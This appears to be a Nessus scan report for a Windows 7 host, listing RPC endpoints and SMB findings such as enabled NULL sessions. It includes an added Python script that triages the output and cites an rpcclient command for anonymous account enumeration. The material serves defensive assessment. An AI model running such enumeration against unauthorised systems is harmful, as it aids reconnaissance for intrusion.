UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0
Description : Unknown RPC service
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0
Description : Unknown RPC service
Annotation : IP Transition Configuration endpoint
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0
Description : Unknown RPC service
Annotation : XactSrv service
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\srvsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\browser
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\srvsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\browser
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\srvsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\browser
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\srvsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\browser
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0
Description : Unknown RPC service
Annotation : IKE/Authip API
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0
Description : Unknown RPC service
Annotation : IKE/Authip API
Type : Remote RPC service
Named pipe : \PIPE\srvsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0
Description : Unknown RPC service
Annotation : IKE/Authip API
Type : Remote RPC service
Named pipe : \PIPE\browser
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0
Description : Unknown RPC service
Annotation : Event log TCPIP
Type : Remote RPC service
Named pipe : \pipe\eventlog
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0
Description : Unknown RPC service
Annotation : NRP server endpoint
Type : Remote RPC service
Named pipe : \pipe\eventlog
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0
Description : DHCP Client Service
Windows process : svchost.exe
Annotation : DHCP Client LRPC Endpoint
Type : Remote RPC service
Named pipe : \pipe\eventlog
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0
Description : Unknown RPC service
Annotation : DHCPv6 Client LRPC Endpoint
Type : Remote RPC service
Named pipe : \pipe\eventlog
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
Description : Unknown RPC service
Annotation : Security Center
Type : Remote RPC service
Named pipe : \pipe\eventlog
Netbios name : \\WIN7
Nessus ID : 10736
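The listing above (and the "available locally" listing for 135/tcp later in this report) is easiest to act on once it is grouped by interface UUID, because the same interface is registered on several pipes and the endpoint-mapper listing also contains ncalrpc endpoints that cannot be reached from the network at all. The following Python script is an added example; it is not part of the original report and not Nessus code. It parses plugin 10736 output in the format shown (including records that the PDF export has fused onto one line), separates "Remote RPC service" endpoints from "Local RPC service" ones, and flags interfaces that deserve a manual check when the "SMB NULL session" finding (plugin 26920) is also present. The UUID-to-name table, the constructed SAMPLE text and the rpcclient verification command are supplied by the example, not by the report.

```python
"""Parse and triage Nessus 'DCE Services Enumeration' output (plugin 10736).
Added example, not part of the original report; see the lead-in for what is assumed."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Interface UUIDs worth a second look. Assumption of this example: names are taken from
# the public MS-SAMR, MS-LSAD, MS-SRVS and MS-TSCH specifications, not from Nessus output.
NOTABLE = {
    "12345778-1234-abcd-ef00-0123456789ac": "SAMR (account database)",
    "12345778-1234-abcd-ef00-0123456789ab": "LSARPC (policy / SID lookup)",
    "4b324fc8-1670-01d3-1278-5a47bf6ee188": "srvsvc (share enumeration)",
    "1ff70682-0a51-30e8-076d-740be8cee98b": "atsvc (AT job scheduling)",
    "86d35949-83c9-4044-b424-db363231fd0c": "SchRpc (Task Scheduler)",
}

# Field labels as the plugin prints them, matched anywhere in the text so that records
# a PDF export fused onto one line ("...RPC serviceNamed pipe : ...") still parse.
FIELD_RE = re.compile(r"(Object UUID|UUID|Description|Windows process|Annotation|"
                      r"Type|Named pipe|Netbios name)\s*:\s*")
ATTR = {"UUID": "iface", "Description": "description", "Annotation": "annotation",
        "Type": "rpc_type", "Named pipe": "pipe"}  # remaining fields are parsed but dropped

@dataclass
class Endpoint:
    object_uuid: str
    iface: str = ""        # interface UUID, lower-cased, version suffix removed
    description: str = ""
    annotation: str = ""
    rpc_type: str = ""     # "Remote RPC service" (pipe over SMB) or "Local RPC service" (ncalrpc)
    pipe: str = ""

    @property
    def remote(self) -> bool:
        """Only 'Remote' endpoints can be bound from the network; 'Local' ones are
        reported by the endpoint mapper on 135/tcp but are not reachable over it."""
        return self.rpc_type.lower().startswith("remote")

def tokenize(text):
    """Yield (field, value) pairs in document order."""
    hits = list(FIELD_RE.finditer(text))
    for i, m in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(text)
        yield m.group(1), text[m.end():end].strip()

def parse(text):
    """Each 'Object UUID' field starts a new Endpoint record."""
    endpoints, cur = [], None
    for field, value in tokenize(text):
        if field == "Object UUID":
            cur = Endpoint(object_uuid=value)
            endpoints.append(cur)
        elif cur is not None and field in ATTR:
            if field == "UUID":  # value looks like "d95afe70-..., version 1.0"
                value = value.lower().split(",")[0]
            setattr(cur, ATTR[field], value)
    return endpoints

def summarize(endpoints):
    """Per interface UUID: pipes that expose it over the network vs. LRPC-only endpoints."""
    by_iface = defaultdict(lambda: {"remote_pipes": set(), "local_pipes": set()})
    for e in endpoints:
        by_iface[e.iface]["remote_pipes" if e.remote else "local_pipes"].add(e.pipe)
    return dict(by_iface)

def triage(endpoints, null_session=False):
    """Notable interfaces with at least one network-reachable endpoint. null_session mirrors
    plugin 26920, which only proves an anonymous IPC$ connect: whether SAMR/LSARPC answer
    anonymously depends on the host's RestrictAnonymous settings and must be verified by
    hand (e.g. rpcclient -U '' -N //HOST -c enumdomusers) before it goes in a report."""
    findings = []
    for iface, info in summarize(endpoints).items():
        if iface in NOTABLE and info["remote_pipes"]:
            findings.append({"name": NOTABLE[iface], "pipes": sorted(info["remote_pipes"]),
                             "verify_anonymous": null_session})
    return findings

# Constructed excerpt in the plugin's format: the second record is deliberately fused as in
# the PDF export; the third is an ncalrpc endpoint of the kind the 135/tcp listing shows.
SAMPLE = r"""The following DCERPC services are available remotely :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Remote RPC service
Named pipe : \pipe\lsass
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Type : Remote RPC serviceNamed pipe : \PIPE\protected_storage
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0
Description : Scheduler Service
Type : Local RPC service
Named pipe : IUserProfile2
"""

if __name__ == "__main__":
    for f in triage(parse(SAMPLE), null_session=True):
        print(f"{f['name']}: reachable via {', '.join(f['pipes'])}"
              + ("; NULL session allowed, verify anonymous access" if f["verify_anonymous"] else ""))
```

Run as-is to triage SAMPLE, or paste the plugin output copied from the report in its place. Nessus rates both listings "Risk factor : None"; the point of grouping them is that SAMR on \pipe\lsass together with an anonymous IPC$ session is a candidate for account enumeration that the scanner's informational rating does not convey, while the atsvc entry in the sample is LRPC-only and is correctly left out. Either way the result is a lead to confirm by hand, not a finding in itself.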
SMB NativeLanMan
Synopsis :
It is possible to obtain information about the remote operating
system.
Description :
It is possible to get the remote operating system name and
version (Windows and/or Samba) by sending an authentication
request to port 139 or 445.
Solution :
n/a
Risk factor :
None
Plugin output :
The remote Operating System is : Windows 7 Professional 7600
The remote native lan manager is : Windows 7 Professional 6.1
The remote SMB Domain Name is : WIN7
Nessus ID : 10785
SMB log in
Synopsis :
It is possible to log into the remote host.
Description :
The remote host is running one of the Microsoft Windows operating
systems. It was possible to log into it using one of the following
accounts :
- NULL session
- Guest account
- Given Credentials
See also :
http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP
http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP
Solution :
n/a
Risk factor :
None
Plugin output :
- NULL sessions are enabled on the remote host
CVE : CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2002-1117, CVE-2005-3595
BID : 494, 990, 11199
Nessus ID : 10394
SMB LanMan Pipe Server browse listing
Synopsis :
It is possible to obtain network information.
Description :
It was possible to obtain the browse list of the remote Windows system
by sending a request to the LANMAN pipe. The browse list is the list of
the nearest Windows systems of the remote host.
Solution :
n/a
Risk factor :
None
Plugin output :
Here is the browse list of the remote host :
WIN7 ( os : 6.1 )
Other references : OSVDB:300
Nessus ID : 10397
SMB NULL session
Synopsis :
It is possible to log into the remote Windows host with a NULL session.
Description :
The remote host is running Microsoft Windows, and it was possible to
log into it using a NULL session (ie, with no login or password). An
unauthenticated remote attacker can leverage this issue to get
information about the remote host.
See also :
http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP
http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP
Solution :
n/a
Risk factor :
None
CVE : CVE-2002-1117
BID : 494
Nessus ID : 26920
SMB registry can not be accessed by the scanner
Synopsis :
Nessus is not able to access the remote Windows Registry.
Description :
It was not possible to connect to PIPE\winreg on the remote host.
If you intend to use Nessus to perform registry-based checks, the registry checks will not work because the 'Remote
Registry Access' service (winreg) has been disabled on the remote host or can not be connected to with the supplied
credentials.
Solution :
n/a
Risk factor :
None
Nessus ID : 26917
Port epmap (135/tcp)
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapper
PIPE) it was possible to enumerate the Distributed Computing Environment
(DCE) services running on the remote port.
Using this information it is possible to connect and bind to
each service by sending an RPC request to the remote port/pipe.
Solution :
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available locally :
Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91
UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : WindowsShutdown
Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91
UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : WMsgKRpc0436C0
Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000
UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : WindowsShutdown
Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000
UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : WMsgKRpc0436C0
Object UUID : 6d726574-7273-0076-0000-000000000000
UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0
Description : Unknown RPC service
Annotation : Impl friendly name
Type : Local RPC service
Named pipe : LRPC-c6a2c9660bb6328c4f
Object UUID : 52ef130c-08fd-4388-86b3-6edf00000001
UUID : 12e65dd8-887f-41ef-91bf-8d816c42c2e7, version 1.0
Description : Unknown RPC service
Annotation : Secure Desktop LRPC interface
Type : Local RPC service
Named pipe : WMsgKRpc043881
Object UUID : b08669ee-8cb5-43a5-a017-84fe00000001
UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : WMsgKRpc043881
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0
Description : IPsec Services (Windows XP & 2003)
Windows process : lsass.exe
Annotation : IPSec Policy agent endpoint
Type : Local RPC service
Named pipe : LRPC-ca5f5144be75bc564b
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0
Description : Unknown RPC service
Annotation : Remote Fw APIs
Type : Local RPC service
Named pipe : LRPC-ca5f5144be75bc564b
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b58aa02e-2884-4e97-8176-4ee06d794184, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : OLE25D40AF7017C4837B051B3DE1DA2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b58aa02e-2884-4e97-8176-4ee06d794184, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : trkwks
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 8174bb16-571b-4c38-8386-1102b449044a, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : LRPC-92b6673cbb004993d5
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a2d47257-12f7-4beb-8981-0ebfa935c407, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : LRPC-92b6673cbb004993d5
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3f31c91e-2545-4b7b-9311-9529e8bffef6, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : LRPC-92b6673cbb004993d5
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 4b112204-0e19-11d3-b42b-0000f81feb9f, version 1.0
Description : SSDP service
Windows process : unknown
Type : Local RPC service
Named pipe : LRPC-4348df7c4ffce47473
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : dd490425-5325-4565-b774-7e27d6c09c24, version 1.0
Description : Unknown RPC service
Annotation : Base Firewall Engine API
Type : Local RPC service
Named pipe : LRPC-5448665e392adc7390
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 7f9d11bf-7fb9-436b-a812-b2d50c5d4c03, version 1.0
Description : Unknown RPC service
Annotation : Fw APIs
Type : Local RPC service
Named pipe : LRPC-5448665e392adc7390
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 2fb92682-6599-42dc-ae13-bd2ca89bd11c, version 1.0
Description : Unknown RPC service
Annotation : Fw APIs
Type : Local RPC service
Named pipe : LRPC-5448665e392adc7390
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1, version 1.0
Description : Unknown RPC service
Annotation : Spooler function endpoint
Type : Local RPC service
Named pipe : spoolss
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : ae33069b-a2a8-46ee-a235-ddfd339be281, version 1.0
Description : Unknown RPC service
Annotation : Spooler base remote object endpoint
Type : Local RPC service
Named pipe : spoolss
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 4a452661-8290-4b36-8fbe-7f4093a94978, version 1.0
Description : Unknown RPC service
Annotation : Spooler function endpoint
Type : Local RPC service
Named pipe : spoolss
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Local RPC service
Named pipe : LRPC-04dfdd309d86a33c86
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Local RPC service
Named pipe : audit
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Local RPC service
Named pipe : securityevent
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Local RPC service
Named pipe : LSARPC_ENDPOINT
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Local RPC service
Named pipe : lsapolicylookup
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Local RPC service
Named pipe : lsasspirpc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Local RPC service
Named pipe : protected_storage
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Local RPC service
Named pipe : samss lpc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Local RPC service
Named pipe : LRPC-04dfdd309d86a33c86
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Local RPC service
Named pipe : audit
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Local RPC service
Named pipe : securityevent
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Local RPC service
Named pipe : LSARPC_ENDPOINT
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Local RPC service
Named pipe : lsapolicylookup
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Local RPC service
Named pipe : lsasspirpc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Local RPC service
Named pipe : protected_storage
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Local RPC service
Named pipe : samss lpc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0
Description : Unknown RPC service
Annotation : NSI server endpoint
Type : Local RPC service
Named pipe : OLEDFFAAD5DBE1B4928A1CFE1851294
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0
Description : Unknown RPC service
Annotation : NSI server endpoint
Type : Local RPC service
Named pipe : LRPC-a1978a56cbce044c9e
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0
Description : Unknown RPC service
Annotation : WinHttp Auto-Proxy Service
Type : Local RPC service
Named pipe : OLEDFFAAD5DBE1B4928A1CFE1851294
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0
Description : Unknown RPC service
Annotation : WinHttp Auto-Proxy Service
Type : Local RPC service
Named pipe : LRPC-a1978a56cbce044c9e
Object UUID : 666f7270-6c69-7365-0000-000000000000
UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0
Description : Unknown RPC service
Annotation : Impl friendly name
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 6c637067-6569-746e-0000-000000000000
UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0
Description : Unknown RPC service
Annotation : Impl friendly name
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601
UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601
UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 736e6573-0000-0000-0000-000000000000
UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0
Description : Unknown RPC service
Annotation : Impl friendly name
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 736e6573-0000-0000-0000-000000000000
UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0
Description : Unknown RPC service
Annotation : Impl friendly name
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 736e6573-0000-0000-0000-000000000000
UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0
Description : Unknown RPC service
Annotation : Impl friendly name
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0
Description : Unknown RPC service
Annotation : IP Transition Configuration endpoint
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0
Description : Unknown RPC service
Annotation : IP Transition Configuration endpoint
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0
Description : Unknown RPC service
Annotation : IP Transition Configuration endpoint
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0
Description : Unknown RPC service
Annotation : XactSrv service
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0
Description : Unknown RPC service
Annotation : XactSrv service
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0
Description : Unknown RPC service
Annotation : XactSrv service
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
